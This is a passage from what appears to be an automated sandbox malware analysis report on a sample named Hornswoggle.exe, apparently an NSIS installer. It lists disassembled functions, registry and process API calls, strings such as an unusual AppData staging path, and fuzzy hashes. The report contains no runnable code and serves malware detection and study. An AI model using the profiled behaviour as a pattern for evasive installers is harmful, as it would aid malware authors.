                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsnA627.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateValuelstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsnA627.tmp
                                                        • API String ID: 1356686001-2589392578
                                                        • Opcode ID: fb028ea9a3c1377fa955fbec5e4f8c63137c8eb023b24ebe4bb089e106aefc17
                                                        • Instruction ID: 5da3480c5977201a3ee5f00a5bba4dd76bcb837ef72d2191196963f4bf358416
                                                        • Opcode Fuzzy Hash: fb028ea9a3c1377fa955fbec5e4f8c63137c8eb023b24ebe4bb089e106aefc17
                                                        • Instruction Fuzzy Hash: C91175B1E00108BFEB10EFA4DE89EAF7A79EB54358F10403AF505B61D1D7B85D419B28
                                                        Function 00405B05 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 707 405b05-405b0f 708 405b10-405b3b GetTickCount GetTempFileNameA 707->708 709 405b4a-405b4c 708->709 710 405b3d-405b3f 708->710 712 405b44-405b47 709->712 710->708 711 405b41 710->711 711->712
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00405B19
                                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405B33
                                                        Strings
                                                        • "C:\Users\user\Desktop\Hornswoggle.exe", xrefs: 00405B05
                                                        • nsa, xrefs: 00405B10
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B08
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: "C:\Users\user\Desktop\Hornswoggle.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                        • API String ID: 1716503409-1054372161
                                                        • Opcode ID: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
                                                        • Instruction ID: 324d89babc139fd35718223d4ac3f7893030d86c2087b7febc7e38ed5d635a65
                                                        • Opcode Fuzzy Hash: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
                                                        • Instruction Fuzzy Hash: ABF082367486086BDB109F55EC08B9BBBADDF91750F10C03BFA089A1D0D6B1B9548B59
                                                        Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 713 402a7a-402aa3 RegOpenKeyExA 714 402aa5-402ab0 713->714 715 402b0e-402b12 713->715 716 402acb-402adb RegEnumKeyA 714->716 717 402ab2-402ab5 716->717 718 402add-402aef RegCloseKey call 4061fc 716->718 720 402b02-402b05 RegCloseKey 717->720 721 402ab7-402ac9 call 402a7a 717->721 725 402af1-402b00 718->725 726 402b15-402b1b 718->726 723 402b0b-402b0d 720->723 721->716 721->718 723->715 725->715 726->723 728 402b1d-402b2b RegDeleteKeyA 726->728 728->723 730 402b2d 728->730 730->715
                                                        APIs
                                                        • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A9B
                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                        • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Close$DeleteEnumOpen
                                                        • String ID:
                                                        • API String ID: 1912718029-0
                                                        • Opcode ID: 917ca6d6ffb3dd8b327bedf28ae44dde583cf997761b7befe2e8046b2babecf8
                                                        • Instruction ID: 2c69578fec59b839bbbb6554d628e5ed2d7180fb0bd31e8d2d7d3181fb534eb1
                                                        • Opcode Fuzzy Hash: 917ca6d6ffb3dd8b327bedf28ae44dde583cf997761b7befe2e8046b2babecf8
                                                        • Instruction Fuzzy Hash: 93113D71A00108BEDF229F90DE89DAA3B7DEB54349B504436F901F10A0D775AE51EB69
                                                        Function 004036F1 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403528,?), ref: 00403703
                                                        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403528,?), ref: 00403717
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004036F6
                                                        • C:\Users\user\AppData\Local\Temp\nsnA627.tmp\, xrefs: 00403727
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsnA627.tmp\
                                                        • API String ID: 2962429428-682364331
                                                        • Opcode ID: bce50272980b2b115c412ee18181e99af888c32c9f017689cab30043875d87d7
                                                        • Instruction ID: a64c404821d2138faf7c298dc7aa4842799881c741ebf925b7f901023762ac75
                                                        • Opcode Fuzzy Hash: bce50272980b2b115c412ee18181e99af888c32c9f017689cab30043875d87d7
                                                        • Instruction Fuzzy Hash: C6E086B0500620D6C524AF7CAD855463B196B413357208322F574F30F1C338AD435EAC
                                                        Function 004015B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040596E: CharNextA.USER32(?,?,C:\,?,004059DA,C:\,C:\,76003410,?,76002EE0,00405725,?,76003410,76002EE0,00000000), ref: 0040597C
                                                          • Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405981
                                                          • Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405995
                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                          • Part of subcall function 00405542: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405585
                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls,00000000,00000000,000000F0), ref: 00401634
                                                        Strings
                                                        • C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls, xrefs: 00401629
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                        • String ID: C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls
                                                        • API String ID: 1892508949-254672218
                                                        • Opcode ID: 7c082fd94d62b49e0a0772216ac902d0a5e288ced7259b00feb75cd76b1be880
                                                        • Instruction ID: f000a06b92b438bb55e13d50866b264c9e4ef6e61e5cb38cc97b05dde0840845
                                                        • Opcode Fuzzy Hash: 7c082fd94d62b49e0a0772216ac902d0a5e288ced7259b00feb75cd76b1be880
                                                        • Instruction Fuzzy Hash: 3F110436504151BFEF217B654C405BF27B0EA92324738467FE592B22E6C63C0A42AA3E
                                                        Function 004059C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00405E63: lstrcpynA.KERNEL32(?,?,00000400,004032D9,00422F20,NSIS Error), ref: 00405E70
                                                          • Part of subcall function 0040596E: CharNextA.USER32(?,?,C:\,?,004059DA,C:\,C:\,76003410,?,76002EE0,00405725,?,76003410,76002EE0,00000000), ref: 0040597C
                                                          • Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405981
                                                          • Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405995
                                                        • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,76003410,?,76002EE0,00405725,?,76003410,76002EE0,00000000), ref: 00405A16
                                                        • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,76003410,?,76002EE0,00405725,?,76003410,76002EE0), ref: 00405A26
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                        • String ID: C:\
                                                        • API String ID: 3248276644-3404278061
                                                        • Opcode ID: 0ef386635608f692f0e7c0f61560742430c47c7f4d5a656852c6bdb0725f2d70
                                                        • Instruction ID: c86e2d8d38d71570b191e9a15eff5061e4cbb4187268480765cc96090d0558f9
                                                        • Opcode Fuzzy Hash: 0ef386635608f692f0e7c0f61560742430c47c7f4d5a656852c6bdb0725f2d70
                                                        • Instruction Fuzzy Hash: A2F07D71200D5052C73233350C4669F1644CE82374708023BF8A0B22D2D73C8D02CD7D
                                                        Function 004055F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 0040561D
                                                        • CloseHandle.KERNEL32(?), ref: 0040562A
                                                        Strings
                                                        • Error launching installer, xrefs: 00405607
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID: Error launching installer
                                                        • API String ID: 3712363035-66219284
                                                        • Opcode ID: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
                                                        • Instruction ID: f5a249c54adfd8c255b7380a03a9b1716d63bb632b604881324be9db7dcd8e21
                                                        • Opcode Fuzzy Hash: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
                                                        • Instruction Fuzzy Hash: EAE0BFB4A002097FEB109B64ED45F7B76ACEB10704F908571BD15F2160D678A9518A79
                                                        Function 004068E3 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8132e083a1160923351ce27f8cc58d18c93b4828372388658a00552e8c1634b1
                                                        • Instruction ID: 9d08257b753d1dc8d50a425e5d18a9377fc83dd762af72a05302a0d5f43d32a7
                                                        • Opcode Fuzzy Hash: 8132e083a1160923351ce27f8cc58d18c93b4828372388658a00552e8c1634b1
                                                        • Instruction Fuzzy Hash: EDA13571E00228CBDB28CFA9C8547ADBBB1FF44305F15816ED856BB281D7785A96CF44
                                                        Function 00406AE4 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8cd2b84360dd7c3bf672bcc78a832e40c60aaabd2d33ded0d5d318971a638696
                                                        • Instruction ID: 4069c4fc72520be48e16bfd385b53c7c255c7f0e47fd3261c7dbfe51bff91a5a
                                                        • Opcode Fuzzy Hash: 8cd2b84360dd7c3bf672bcc78a832e40c60aaabd2d33ded0d5d318971a638696
                                                        • Instruction Fuzzy Hash: 0B913470E04228CBEF28CF99C8547ADBBB1FF44305F15816AD856BB291C378A996CF44
                                                        Function 004067FA Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 41c8aa7f72f1f93a2cbcdf9f632d1ef5542b7afda86631119225c1b51720529c
                                                        • Instruction ID: e16a5cd5122dbeef30614bcf2b0def54f3f28e6aa070a3c0d2e235184150711d
                                                        • Opcode Fuzzy Hash: 41c8aa7f72f1f93a2cbcdf9f632d1ef5542b7afda86631119225c1b51720529c
                                                        • Instruction Fuzzy Hash: B1814771E04228CBDF24CFA9C8447ADBBB1FF44305F25816AD856BB281C7789996CF54
                                                        Function 004062FF Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 344cb5358226c0404198c7d180aef45b95627368966a6db8480b9102282d8a8c
                                                        • Instruction ID: 250af7da94f29308333f8738aaa2927d74ee5fc9a8e658dcecc26e0f3faccd11
                                                        • Opcode Fuzzy Hash: 344cb5358226c0404198c7d180aef45b95627368966a6db8480b9102282d8a8c
                                                        • Instruction Fuzzy Hash: A7816631E04228DBDF24CFA9C8447AEBBB1FF44305F11816AD856BB281C7785A96CF54
                                                        Function 0040674D Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
